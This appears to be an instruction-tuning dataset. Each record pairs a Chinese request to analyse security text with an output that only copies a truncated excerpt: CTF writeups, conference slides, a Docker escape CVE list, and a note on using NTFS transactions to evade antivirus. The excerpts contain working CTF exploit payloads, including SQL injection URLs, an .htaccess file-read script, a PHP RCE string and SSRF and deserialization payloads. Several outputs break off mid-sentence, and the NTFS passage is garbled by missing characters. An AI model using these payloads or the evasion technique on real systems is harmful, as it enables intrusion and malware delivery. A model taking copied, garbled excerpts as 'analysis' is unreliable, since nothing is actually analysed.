{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# CONTRIBUTING PayloadsAllTheThings' Team :heart: pull requests :) Feel free to improve with your payloads and techniques ! You can also contribute with a :beers: IRL, or using the sponsor button. ## Pull Requests Guidelines In order to provide the safest payloads for the community, the following rules must be followed for **every** Pull Request. - Payloads must be sanitized - Use `id`, and `whoami`, for RCE Proof of Concepts - Use `[REDACTED]` when the user has to replace a domain for a callback. E.g: XSSHunter, BurpCollaborator etc. - Use `10.10.10.10` and `10.10.10.11` when the payload require IP addresses - Use `Administrator` for privileged users and `User` for normal account - Use `P@ssw0rd`, `Password123`, `password` as default passwords for your examples - Prefer commonly used name for machines such as `DC01`, `EXCHANGE01`, `WORKSTATION01`, etc - References must have an `author`, a `title` and a `link`. The `date` is not mandatory but appreciated :) ## Techniques Folder Every section should contains the following files, you can use the `_template_vuln` folder to create a new technique folder: - README.md - vulnerability description and how to exploit it, including several payloads, more below - Intruder - a set of files to give to Burp Intruder - Images - pictures for the README.md - Files - some files referenced in the README.md ## README.md format Use the following example to create a new technique `README.md` file. ```markdown # Vulnerability Title > Vulnerability description ## Summary * [Tools](#tools) * [Something](#something) * [Subentry 1](#sub1) * [Subentry 2](#sub2) * [References](#references) ## Tools - [Tool 1](https://example.com) - [Tool 2](https://example.com) ## Something Quick explanation ### Subentry 1 Something about the subentry 1 ## References - [Blog title - Author, Date](https://example.com) ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 威胁检测与响应闭环思路汇总 ## 理论模型 ### Kill Chain 可以精简一下嗅探行为入侵利用C&C控制横向扩散外传检测对应的防护可以参考[2] > 通过分析侦察嗅探阶段可以发现攻击者的攻击路径以及攻击目标的选择在这一阶段在边界防护策略或主机安全上加固以加强防御将攻击者挡在第一道防护线外 > > 在驻留C&C控制阶段,可以看到网络攻击者为了维护网络访问权限所作的各种工作以便引入新的攻击工具在这些环节中发现威胁可以斩除失陷主机和远程控制的连接防止损失 > > 在横向扩散数据外传这样的执行阶段我们要关注攻击者如何执行最终目标执行横向移动感染更多的主机在这一阶段我们需要的就是终止攻击者的恶意行为尽量减少损失 ## 架构思路一威胁检测与响应的闭环 检测 + 定位 + 处置 + 溯源 = 威胁检测与响应的闭环 ![](https://image-host-toky.oss-cn-shanghai.aliyuncs.com/20200912093335.png) 图企业级威胁检测与响应架构[1] ## References \\[1]基于**Sysmon**的企业级威胁检测与响应闭环樊兴华微步在线首席分析师2019CTIC分享的议题 \\[2] 换个技术视角发现企业内网失陷主机态势感知团队 启明星辰泰合https://update.venuseye.com.cn/reports/1574921412531/2019112604.html", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Floppy 2 Misc. ## Description: > Looks like you found a way to open the file in the floppy! But that `www.com` file looks suspicious.. Dive in and take another look? ## Solution: Let's take a look at `www.com`, which we extracted during the [First Floppy](Floppy.md) challenge: ```console root@kali:/media/sf_CTFs/google/floppy/foo# file www.com www.com: ASCII text, with CR, LF line terminators root@kali:/media/sf_CTFs/google/floppy/foo# xxd www.com 00000000: 6844 3758 2d74 3675 675f 686c 285d 5768 hD7X-t6ug_hl(]Wh 00000010: 3824 5e31 3547 4731 2d68 6272 5835 7072 8$15GG1-hbrX5pr 00000020: 5059 4757 5e51 4649 7578 5947 464b 2c31 PYGWQFIuxYGFK,1 00000030: 2d46 4749 7571 5a68 4849 5825 4129 4921 -FGIuqZhHIX%A)I! 00000040: 6853 4c58 3453 4921 7b70 2a53 3a65 544d hSLX4SI!{p*S:eTM 00000050: 277e 5f3f 6f3f 563b 6d3b 4367 4141 5d55 '~_?o?V;m;CgAA]U 00000060: 6429 484f 3b7b 206c 7b7d 396c 3e6a 4c4c d)HO;{ l{}9l>jLL 00000070: 505b 2d60 7c30 6776 5059 306f 6e51 3067 P[-`|0gvPY0onQ0g 00000080: 655a 3077 5935 3e44 3067 5d68 2b28 582d eZ0wY5>D0g]h+(X- 00000090: 6b26 3460 505b 302f 2c36 3422 5034 4150 k&4`P[0/,64\"P4AP 000000a0: 470d 5468 6520 466f 6f62 616e 697a 6572 G.The Foobanizer 000000b0: 3930 3030 2069 7320 6e6f 206c 6f6e 6765 9000 is no longe 000000c0: 7220 6f6e 2074 6865 204f 6666 4875 6220 r on the OffHub 000000d0: 444d 5a2e 2020 2020 2020 2020 2020 240a DMZ. $. 000000e0: 0d . ``` It's a com file, but it doesn't look like much of an executable. After many failed attempts to figure out how to decode the text, I ran out of ideas and as a last resort, tried to run the file in DOSBox, since essentially that's one thing I'd do with a standard `com` file. To my great surprise, it ran: ``` C:\\>WWW.COM The Foobanizer 9000 is no longer on the OffHub DMZ. ``` Time for the [DOSBox Debugger](https://www.vogons.org/viewtopic.php?f=32&t=7323) (usage [here](https://www.vogons.org/viewtopic.php?t=3944)). Launch the debugger, then: 1. Alt+Pause (break) - perform halt 2. `bpint 21 *` - Se", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\npackage com.vulhub.authzvuln; import org.springframework.boot.SpringApplication; import org.springframework.boot.autoconfigure.SpringBootApplication; @SpringBootApplication(scanBasePackages = { \"com.vulhub\" }) public class App { public static void main(String[] args) { SpringApplication.run(App.class, args); } }", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBeyond the MCSE: Red Teaming Active Directory Sean Metcalf (@Pyrotek3) s e a n @ adsecurity . org www.ADSecurity.org About Me Founder Trimarc, a security company. Microsoft Certified Master (MCM) Directory Services Microsoft MVP Speaker: Black Hat, BSides, DEF CON, DerbyCon, Shakacon Security Consultant / Security Researcher Own & Operate ADSecurity.org (Microsoft platform security info) | @PryoTek3 | sean @ adsecurity.org | Agenda Key AD components Offensive PowerShell Effective AD Recon AD Defenses & Bypasses Security Pros Checklist | @PryoTek3 | sean @ adsecurity.org | Hacking the System PS> Get-FullAccess | @PryoTek3 | sean @ adsecurity.org | | @PryoTek3 | sean @ adsecurity.org | | @PryoTek3 | sean @ adsecurity.org | | @PryoTek3 | sean @ adsecurity.org | Differing Views of Active Directory Administrator Security Professional Attacker Complete picture is not well understood by any single one of them | @PryoTek3 | sean @ adsecurity.org | AD Administrator/Engineer | @PryoTek3 | sean @ adsecurity.org | Security Pro | @PryoTek3 | sean @ adsecurity.org | Attacker | @PryoTek3 | sean @ adsecurity.org | Active Directory Security | @PryoTek3 | sean @ adsecurity.org | | @PryoTek3 | sean @ adsecurity.org | | @PryoTek3 | sean @ adsecurity.org | | @PryoTek3 | sean @ adsecurity.org | | @PryoTek3 | sean @ adsecurity.org | | @PryoTek3 | sean @ adsecurity.org | | @PryoTek3 | sean @ adsecurity.org | Can Control Another Domain in the Forest!?! Admins in One Domain | @PryoTek3 | sean @ adsecurity.org | Domain Controllers  Contains & replicates domain data.  Provides authentication & directory services.  Central set of servers for client communication.  Can host the Global Catalog.  Stores the domain AD database (NTDS.dit).  Hosts the domain DFS root (\\\\domain.com\\) & NETLOGON & SYSVOL shares.  DNS (AD-Integrated) | @PryoTek3 | sean @ adsecurity.org | Read-Only Domain Controllers Read-only DC, DNS, SYSVOL RODC Admin delegation to non DAs No passwords cached (default) KRBTGT cryptogra", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nS-shiro550 前言 环境搭建 1. 参考文章 Shiro 反序列化记录 Shiro RememberMe 1.2.4 反序列化导致的命令执行漏洞 2. 远程调试 tomcat 启动修改新建 debug.bat 文件内容如下 IDEA 配置远程 Tomcat 服务器 set JPDA_ADDRESS=8000 set JPDA_TRANSPORT=dt_socket set CATALINA_OPTS=-server -Xdebug -Xnoagent -Djava.compiler=NONE - Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8000 startup 基本流程跟踪 1. 登录功能触发点 org.apache.shiro.mgt.AbstractRememberMeManager#onSuccessfulLogin 2. 触发时堆栈情况 3. 踩坑 此处需要配置 RememberMeManager 不然此处为空无法进入 onSuccessfulLogin 方法之前一 直尝试不使用 web 进行配置失败了 需要勾选 rememberMe 字段也就是 this.isRememberMe(token) 不为空 加密过程跟踪调试 1. 通过上面的 onSuccessfulLogin 方法之后如果 isRememberMe 不为空则进入到 rememberIdentity 方法当中 2. 进入该函数之后获取一个 principals 属性该属性实际是登录时传递的用户名 root 之后再进 入到 rememberIndentity 方法当中 3. 在 rememberIdentity 方法中首先调用 convertPrincipalsToBytes 方法将 principals 进 行处理处理第一步是进行序列化也就是 serialize 方法这个方法最终调用的是 org.apache.shiro.io.DefaultSerializer.class#serialze 方法 4. 在完成序列化之后会再返回 convertPrincipalsToBytes 方法对字节数组调用 encrypt 方法进 行加密 AbstractRememberMeManager.class#encrypt 5. 在 encrypt 方法中首先是获取加密服务而这个加密服务是一个 AES 加密算法之后首先通过 getEncryptionCipherKey 方法获取加密密钥然后进入 encrypt 方法 6. 在 JcaCipherService.class 中最终调用本类的 encrypt 方法进行加密最后返回结果 7. 然后返回结果再次回到 rememberIdentity 方法中进入 rememberSerializedIdentity 方 法该方法的具体实现类是 CookieRememberMeManager.class#rememberSerializedIdentity 8. 这个方法的主要作用是对 AES 加密后的数据进行 base64 编码然后返回存入 cookie 当中 解密过程跟踪调试 1. 首先在加密过程中调用的 AbstractRememberMeManager.class 类中找到 decrypt 方法这个也 是解密调用的函数下断点查看堆栈的调用情况 2. 当我们发起请求访问时会根据是否存在 rememberMe 字段进行一系列的判断如果请求中存在 rememberMe 字段则会对传递的这个 cookie 值进行获取解密等一系列操作具体的实现体现 在 AbstractRememberMeManager.class#getRememberedPrincipals 方法中通过这个方法去判 断是否存在 rememberMe 字段并且从 cookie 中获取该字段值 3. 具体跟进查看详情在第86行获取到请求中的 rememberMe 字段值然后进行 base64 解码后返 回返回上一步后的 bytes 数组不为空直接进行下一步的解密处理否则直接返回空 4. 此处 bytes 数组不为空进入 convertBytesToPrincipals 函数跟踪进入在第137行进入解 密过程解密完成后返回结果 5. 但此时我们的数据是错误的使用密钥无法解密则会产生一个报错进入到 AbstractRememberMeManager.class#getRememberedPrincipals 方法的 catch 当中也就是 onRememberedPrincipalFailure 函数这个函数经过一系列的函数调用最后会在响应头中返 回 rememberMe=deleteMe 的 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n在P师傅小密圈看到了一道有意思的注入题 http://47.98.160.61/1.php?showme=1 代码如下 1 <?php 2 if(!empty($_GET['showme'])) 3 highlight_file(__FILE__); 4 $aaa=mysqli_connect(\"127.0.0.1\",\"test\",'test','test'); 5 if(empty($_GET['id'])){ 6 $id=1; 7 }else{ 8 $id=$_GET['id']; 9 } 10 $clean = strtolower($id); 11 if (strpos($clean,'select') !== false){echo 'waf';exit();} 12 var_dump(\"select * from news where id='$id'\"); 13 $result=mysqli_query($aaa,\"select * from news where id='$id'\"); 14 $row=mysqli_fetch_array($result); 15 $title=$row['title']; 16 $content=$row['content']; 17 echo \"<h1>$title</h1><br>\"; 18 19 echo \"<h2>$content</h2><br>\"; 从代码上来看过滤了select这里代码的过滤我是绕不过去所以把重点放在了如何在不使用select关键字的 情况下依旧可以注入 在2019强网杯有一道类似的题是可以使用堆叠注入通过预处理语句拼接关键字进行绕过但是这里的代码并 不支持堆叠注入 猜测这里的tips可能和mysql的版本特性有关系不能使用select但是可以通过盲注先获取一下mysql的版本信 息 通过盲注得到mysql版本为: 8.0.20-0ubuntu0.20.04.1 猜测和版本特性有关于是查看了mysql的官方文档在当中查找到了答案 https://dev.mysql.com/doc/refman/8.0/en/table.html https://dev.mysql.com/doc/refman/8.0/en/values.html https://dev.mysql.com/doc/refman/8.0/en/union.html 在mysql8.0.19当中引入了两个DML语句table和values table mysql8.0.19引入返回命名表的行和列 1 TABLE table_name [ORDER BY column_name] [LIMIT number [OFFSET number]] 简单概括一下文档中介绍的个人理解 table table_name相当于select * from table_name可以理解为这两个语句产生的执行效果是一样的但是 table table_name使用时有一些限制如下 1只能显示表的所有列也就是没有办法获取指定的列 2不能使用where子句 所以当存在两个表A和B并且A和B的列数一样时当注入点如下 select * from A where xxx=xxx 就可以构造 select * from A where xxx=xxx and 1=2 union table B-- - 此时如果页面有回显,就可以获取到B表的数据 所以这道题可以用这个方式获取admin表的数据一开始提示了两个表的列数相同 http://47.98.160.61/1.php?showme=1&id=-1%27%20%20union%20table%20admin--%20- values mysql8.0.19引入返回一组一个或多个行作为表换句话说它是一个表值构造函数还可以充当独立的SQL语 句 1 VALUES row_constructor_list [ORDER BY column_designator] [LIMIT BY number] 2 3 row_constructor_list: 4 ROW(value_list)[, ROW(value_list)][, ...] 5 6 value_list: 7 value[, value][, ...] 8 9 column_designator: 10 column_index 理解 通过执行values row(1,2,...)[row(3,4,...)]会生成一个表表的列名为column_0column_1.... select * from A where xxx=xxx union values row(1,2,3); 类似于 select * fro", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSoft7: Revealing Siemens S7 PLCs secrets | #BHUSA @BlackHatEvents sOfT7: Revealing the Secrets of the Siemens S7 PLCs Sara Bitan | Alon Dankner Joint work with Professor Eli Biham, Maxim Barsky and Idan Raz Faculty of Computer Science, Technion  Israel Institute of Technology Soft7: Revealing Siemens S7 PLCs secrets | #BHUSA @BlackHatEvents Who are we? Founder and CEO of CyCloak: Secure system design and audit Sara Bitan Alon Dankner 2 Senior researcher at the Technion Hiroshi Fujiwara Cyber Security Research Center Advisors: Prof. Eli Biham, Dr. Sara Bitan Security researcher M.Sc. graduate from the Technion Soft7: Revealing Siemens S7 PLCs secrets | #BHUSA @BlackHatEvents PLCs turn rogue Stuxnet (Anonymous author)  Exploit a vulnerable Siemens Step7 engineering station/ WinCC HMI client  Inject a rogue control program, and tamper with HMI outputs Rogue7: Rogue Engineering-Station attacks on S7 Simatic PLCs (Biham, et al)  A phyton script impersonating an engineering WS  All S7 PLCs from the same model and firmware version share the same key Doors of Durin: The Veiled Gate to Siemens S7 Silicon (Abbasi, et al)  Siemens S7-1200 PLC Bootloader Arbitrary Code Execution  Siemens S7 firmware is using Adonis kernel The Race to Native Code Execution in PLCs (Keren)  Remote arbitrary code execution on Siemens S7-1500  Exploiting memory protection vulnerability to escape the control program sandbox 3 Soft7: Revealing Siemens S7 PLCs secrets | #BHUSA @BlackHatEvents ICS architectures are evolving 4 Soft7: Revealing Siemens S7 PLCs secrets | #BHUSA @BlackHatEvents Software PLCs Smart Manufacturing  New requirements from PLC vendors  New features: IDEs, new protocols, extensive cloud communication Vendor Requirements  Agility and flexibility  Preserve existing IP and technology  The solution: software PLCs New PLC architecture  Generic functions: GP OS  updatable, flexible Standard hardware  Legacy functions : proprietary OS - closed and hardened  Virtualization: isolation and", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPowerPreter: Post Exploitation like a boss Nikhil Mittal Get-Host  Hacker who goes by the handle SamratAshok  Twitter - @nikhil_mitt  Blog  http://labofapenetrationtester.blogspot.com  Creator of Kautilya and Nishang  Interested in Offensive Information Security, new attack vectors and methodologies to pwn systems.  Freelance penetration tester *hint*  Spoken at BlackHat, Troopers, PHDays and more 2 Powerpreter by Nikhil Mittal Get-Content  Need for Post Exploitation  PowerShell  Why PowerShell?  Introducing  Powerpreter  Architecture  Usage  Payloads  Capabilities  Deployment  Limitations  Conclusion 3 Powerpreter by Nikhil Mittal Need for Post Exploitation  The most important part of a penetration test.  Guy who will pay you $$$ do not understand technology (neither he wants to). A shell is not what he wants from you.  IMHO, this differentiates a good pen tester and one-click-i-pwn-you-omg pen tester.  Etc Etc 4 Powerpreter by Nikhil Mittal PowerShell  A shell and scripting language present by default on new Windows machines.  Designed to automate things and make life easier for system admins.  Based on .Net framework and is tightly integrated with Windows. 5 Powerpreter by Nikhil Mittal 6 Powerpreter by Nikhil Mittal Why PowerShell?  Provides access to almost everything in a Windows platform which could be useful for an attacker.  Easy to learn and really powerful.  Trusted by the countermeasures and system administrators.  Consider it bash of Windows.  Less dependence on msf and <insert_linux_scripting>-to-executable libraries. 7 Powerpreter by Nikhil Mittal Powerpreter - Introduction  A post exploitation tool written completely in powershell.  To be a part of Nishang, powershell based post exploitation framework, written by the speaker.  The name is similar to meterpreter. Powerpreter wants to be like meterpreter after growing up :) 8 Powerpreter by Nikhil Mittal Powerpreter - Architecture  Powerpreter is a powershell module and/or script depending on the usage", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAndroid平台 安全漏洞回顾 肖梓航Claud Xiao HITCON 2013 关于演讲者  肖梓航Claud Xiao <secmobi@gmail.com>  安天实验室 高级研究员  方向Android和Windows的反病毒软 件安全  看雪乌云Insight Labs等社区和组织 的成员xKungFooMDCCISF等会 议的讲师  http://blog.claudxiao.net  http://wiki.secmobi.com 关于议题  Android的内核系统框架应用软件 频繁出现安全漏洞 Android相关漏洞不完整数据 来源http://android.scap.org.cn 2013.07.01 Android漏洞不完整数据 来源http://www.cvedetails.com/product/19997/Google-Android.html 2013.07.01 Android软件漏洞不完整数据 来源Claud Xiao统计不代表乌云观点2013.07.01 Jiang@NCSULuo@PolyU HKFahl@Leibniz University of Hannover 等团队在最近两年也发现了大量Android软件漏洞 关于议题  Android的内核系统框架应用软件 出现了许多安全漏洞  回顾这些漏洞介绍30个经典的案例和4 个demo分析产生问题的原因  希望成为进一步工作的基础漏洞挖掘 漏洞攻击漏洞检测安全开发补丁 分发系统加固攻击缓解 系统的权限提升漏洞 通用提权漏洞及其利用代码  CVE-2009-1185 Exploid  CVE-2011-1823 Gingerbreak  CVE-2012-0056 Mempodroid  CVE-2009-2692 Wunderbar  CVE-2011-3874 ZergRush  Zimperlich / Zygote setuid  CVE-2012-6422 Exynosrageagainstthecage /adb setuidCVE-2011-1149 psneuterLevitatorASHMEM   案例1利用adb backup提权  Android 4.0.4 ICS备份功能与 Settings.apk一些缺陷结合的提权漏洞  可以获得Google Glass的root权限  LG公司OEM的备份功能也出现类似问 题导致40多款手机可以root 设备特有的提权漏洞  许多厂商的设备中出现 独有的提权漏洞  Samsung  Motorola  LG  ZTE  Huawei  Sony 产生漏洞的原因包括 重要系统目录或文件的权 限配置不当 自己添加的系统服务以过 高的权限运行 定制的硬件驱动存在各类 编码漏洞 写入文件没有考虑符号链 接  案例2ZTE提权后门  CVE-2012-2949 ZTE ZXDSL 831IIV7提 权漏洞  magic code: sync_agent ztex1609523 http://www.symantec.com/connect/blogs/zte-score-privilege-escalation-nutshell 更底层的问题  bootloader  CPU/TrustZone  使用Qualcomm MSM8960芯片的 Motorola bootloader  使用 Snapdragon芯片 的Samsung Galaxy S4    向Dan Rosenberg致 敬 Linux Kernel 1-day  CVE-2012-0056 Linux的/proc/pid/mem 文件被写入导致本地权限提升漏洞  CVE-2013-2094 Linux性能计数器界限 检查不当导致本地权限提升漏洞  CVE-2013-1773 Linux内核VFAT文件系 统实现缓冲区溢出导致本地权限提升漏 洞  还有许多比如 案例3FirefoxOS提权  ZTE Open第一台普通FirefoxOS手 机 2013.07.02发售  三天之后被root http://pof.eslack.org/2013/07/05/zte- open-firefoxos-phone-root-and-first- impressions/  高通芯片Android驱动的已知提权漏洞及 其利用  CVE-2012-4220 (Qualcomm DIAG root)  FirefoxOS复用了Android的驱动和NDK demo 1  Nexus 4/Android 4.2.2本地root权限获取 漏洞  清华大学NISL实验室发现并授权播放本视频  不提供具体的漏洞编号和可用的提权代码但上下文", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n津杯Writeup - Nu1L 津杯Writeup - Nu1L Web UploadHub hate_php GoOSS power_cut RE GoodRE easyRe Crypto 混合编码 justOCB rsa Pwn pwnme PwnCTFM no1 easypwn Misc m1bmp m0usb Mobile hellehellokey Web UploadHub hate_php import requests import string import hashlib ip = requests.get('http://118.24.185.108/ip.php').text print(ip) def check(a): f = ''' <If \"file('/flag')=~ /'''+a+'''/\"> ErrorDocument 404 \"wupco\" </If> ''' resp = requests.post(\"http://122.112.248.222:20003/index.php?id=167\", data={'submit': 'submit'}, files={'file': ('.htaccess',f)} ) a = requests.get(\"http://122.112.248.222:20003/upload/\"+ip+\"/a\").text if \"wupco\" not in a: return False else: return True flag = \"flag{BN\" c = string.ascii_letters + string.digits + \"\\{\\}\" for j in range(32): for i in c: print(\"checking: \"+ flag+i) if check(flag+i): flag = flag+i print(flag) break else: continue 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 http://122.112.214.101:20004/?code=?><?=`/???/???%20/????`; 1 GoOSS 按照下这个payload就可以302跳转出去了再利302跳转到127.0.0.1:80/index.php即可任意件读 取获取flag {\"url\": \" http://127.0.0.1:1234 \\u002f/test.d7cb7b72.y7z.xyz/../../813d620e0a68533883f897c4e03cf17c\"} power_cut RE GoodRE TEA加密 http://119.3.128.126:32800/? log=O%3A6%3A%22weblog%22%3A1%3A%7Bs%3A10%3A%22weblogfile%22%3Bs%3A5%3A%22%2F flflagag%22%3B%7D 1 import sys from ctypes import * from pwn import * def encipher(v, k): y = c_uint32(v[0]) z = c_uint32(v[1]) sum = c_uint32(0) delta = 0x9e3779b9 n = 32 w = [0,0] while(n>0): sum.value += delta y.value += ( z.value << 4 ) + k[0]  z.value + sum.value  ( z.value >> 5 ) + k[1] z.value += ( y.value << 4 ) + k[2]  y.value + sum.value  ( y.value >> 5 ) + k[3] n -= 1 w[0] = y.value w[1] = z.value return w 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 easyRe 算法: def decipher(v, k): y = c_uint32(v[0]) z = c_uint32(v[1]) sum = c_uint32(0xc6ef3720) delta = 0x9e3779b9 n = 32 w = [0,0] while(n>0): z.value -= ( y.value << 4 ) + k[2]  y.value + sum.value  ( y.value >> 5 ) + k[3]", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLiar! Macs have no viruses! -[ OS X Kernel Rootkits ]-  Don't take me too seriously, I fuzz the Human brain!  The capitalist \"pig\" degrees: Economics & MBA.  Worked for the evil banking system!  Security Researcher at COSEINC.  \"Famous\" blogger.  Wannabe rootkits book writer.  Love a secondary curvy road and a 911. Who Am I Prologue  OS X Kernel rootkits.  Ideas to improve them.  Sample applications.  Raise awareness and interest in this area. Today's subject Prologue  Reaching to uid=0 is your problem!  The same with startup and persistency aka APT.  Should be easier to find the necessary bugs.  Less research = Less audits = More bugs.  Main target is Mountain Lion.  Also works with Mavericks (tested with DP1). Assumptions (the economists dirty secret that makes everything possible) Prologue  OS X rootkits are a rare \"species\".  Interesting hardware rootkits (Dino's Vitriol and Snare's EFI) but NO full code available L.  Commercial rootkits: Crisis from Hacking Team and maybe FinFisher (iOS yes, OS X never saw).  Crisis is particularly bad.  Not many detection tools available. Current state of the art Simple Ideas Simple Ideas  Many interesting kernel symbols are not exported.  Some are available in Unsupported & Private KPIs.  Not acceptable for stable rootkits.  Solving kernel symbols from a kernel extension is possible since Lion.  Not in Snow Leopard and previous versions. Problem #1 Simple Ideas  __LINKEDIT segment contains the symbol info.  Zeroed up to Snow Leopard.  OS.X/Crisis solves the symbols in userland and sends them to the kernel rootkit. Simple Ideas  One easy solution is to read the kernel image from disk and process its symbols.  The kernel does this every time we start a new process.  Possible to implement with stable KPI functions.  Kernel ASLR slide is easy to obtain in this scenario. Simple Ideas Simple Ideas  Virtual File System  VFS.  Read and write any file using VFS functions.  Using only KPI symbols.  Recipe for success: q Vnode. q VFS co", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNTFS transactions的研究 之前看到的transacted_hollowing(https://github.com/hasherezade/transacted_hollowing) 和 最近blackhat上 的个议题rope都到了NTFS事务来达到隐藏件免杀的效果所以就学习了下NTFS transactions的些操 作 介绍 NTFS transactions https://docs.microsoft.com/en-us/windows/win32/fileio/about-transactional-ntfs Transactional NTFS (TxF) 是在 Windows Vista 中引的作为将原件事务引 Windows 的种 式它允许 Windows 开发员在具有单个件的事务涉及多个件的事务以及跨越多个源的事务中进 件操作的事务原性例如注册表通过 TxR和数据库例如 SQL 虽然 TxF 是组强的 API但 Windows Vista 以来开发员对该 API 平台的兴趣极其有限主要是因 为其复杂性和开发员在应程序开发过程中需要考虑的各种细微差别因此Microsoft 正在考虑在未来 版本的 Windows 中弃 TxF API以便将开发和维护作重点放在对多数客户更有价值的其他功能和 API 上 Transactional NTFS (TxF)即NTFS事务 和数据库的事务类似开启事务后对件的修改添加删除都会在单独 的空间中之后可以使 commit 来提交修改到硬盘上或者 rollback 回滚到个初始状态 Transactional NTFS (TxF) 是从Vista开始的官档说在未来可能不可但少前的可的 代码 以transacted_hollowing的代码为例https://github.com/hasherezade/transacted_hollowing/blob/main/tran sacted_file.cpp 代码主要通过NTFS事务把payload写进去再从内存加载我单独将NTFS事务相关的代码提取了出来 #include <KtmW32.h> #include <iostream> #include <stdio.h> #include \"ntddk.h\" #pragma comment(lib, \"KtmW32.lib\") #pragma comment(lib, \"Ntdll.lib\") DWORD options, isolationLvl, isolationFlags, timeout; options = isolationLvl = isolationFlags = timeout = 0; HANDLE hTransaction = CreateTransaction(nullptr, nullptr, options, isolationLvl, isolationFlags, timeout, nullptr); // 创建个NTFS事务 if (hTransaction == INVALID_HANDLE_VALUE) { std::cerr << \"Failed to create transaction!\" << std::endl; return INVALID_HANDLE_VALUE; NTFS 事务在红队中的作 TxF开启事物后所有的操作在commit之前都不会写硬盘但是它会返回给你个件句柄你可以在这进 正常的读写操作之前调 RollbackTransaction 函数进回滚回恢复到初始状态对操作系统来说没有 任何的件写 最重要的是对于杀毒来说它也法检测到你NTFS事务进的操作 在下载beacon代码时可以这种法分段下载代码或分段解密写到NTFS事务中最后从NTFS读取后进 回滚达到最终件 } HANDLE hTransactedFile = CreateFileTransactedW(dummy_name, GENERIC_WRITE | GENERIC_READ, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL, hTransaction, NULL, NULL ); // 创建事务件 if (hTransactedFile == INVALID_HANDLE_VALUE) { std::cerr << \"Failed to create transacted file: \" << GetLastError() << std::endl; return INVALID_HANDLE_VALUE; } DWORD writtenLen = 0; // 写件 if (!Writ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: Docker 逃逸漏洞汇总 --- <center><h1>Docker 逃逸漏洞汇总</h1></center> --- Docker 的安全风险主要还是集中在逃逸这块儿下面是我总结的 Docker 逃逸漏洞文库中将不断补全这块的漏洞复现文章 ## 1Docker 自身漏洞 - cve-2017-1002101 - cve-2018-1002100 - cve-2018-15664 符号链接替换漏洞 - cve-2019-14271 加载不受信任的动态链接库 - cve-2019-1002101 - cve-2019-11246 - cve-2019-11249 - cve-2019-11251 - cve-2019-16884 - cve-2019-5736 runc 逃逸 - cve-2020-15257 - cve-2020-27151 - kata-escape-2020 - cve-2021-25741 - cve-2021-30465 - cve-2022-0492 ## 2内核漏洞 - cve-2016-5195 DirtyCow - cve-2017-1000112 - cve-2020-14386 - cve-2021-22555 - cve-2022-0847 DirtyPipe ## 3不安全的配置 - privileged-container - mount-docker-sock - mount-host-etc - mount-host-procfs - mount-var-log - cap_dac_read_search-container - cap_sys_admin-container <Vssue /> <script> export default { mounted () { this.$page.lastUpdated = \"2022年4月15日\" } } </script>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 应急 --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- > 应急离不开调查取证,请配合 [取证](./取证.md) 使用 ## 大纲 * **[威胁情报](#威胁情报)** * [情报中心](#情报中心) * [样本分析检测](#样本分析检测) * [恶意样本查询](#恶意样本查询) * [钓鱼监测](#钓鱼监测) * [暗网监测](#暗网监测) * [URL分析](#url分析) * [IP分析](#ip分析) * [PassiveDNS](#passivedns) * [IOCs](#iocs) * **[系统层面](#系统层面)** * [Rootkit](#rootkit) * [勒索软件](#勒索软件) * **[Web层面](#Web层面)** * [暗链](#暗链) * [webshell后门](#webshell后门) * **[网络层面](#网络层面)** * [DDOS](#ddos) --- **相关文章** - [应急响应日志分析小脚本](https://www.freebuf.com/sectool/223446.html) - [应急响应一文了解应急响应中常用的日志收集方法](https://mp.weixin.qq.com/s/ZY3gqly-z-L8XFW9ML5aow) - [容器安全事件排查与响应](https://mp.weixin.qq.com/s/rOOr_wCF4egpV_QlRIbtjQ) **应急案例** - [6.[应急响应]Linux 入侵排查思路 - bmjoker](https://www.cnblogs.com/bmjoker/p/9557033.html) - [Linux应急响应 (一) :SSH 暴力破解](https://www.secpulse.com/archives/76051.html) - [记一次博客被日的分析过程](https://bbs.ichunqiu.com/thread-44743-1-2.html) - [metinfo后台getshell exp](https://bbs.ichunqiu.com/thread-29582-1-3.html) - [一键安装藏隐患,phpStudy 批量入侵的分析与溯源](https://www.anquanke.com/post/id/162787) - [一次入侵应急响应分析](https://www.freebuf.com/articles/network/186071.html) - [Linux入侵取证从一次应急事件讲起](https://www.freebuf.com/articles/system/50728.html) - [记一次耗时几天的挖矿脚本应急响应](https://blog.fullstackpentest.com/record-a-server-emergency-response.html) - 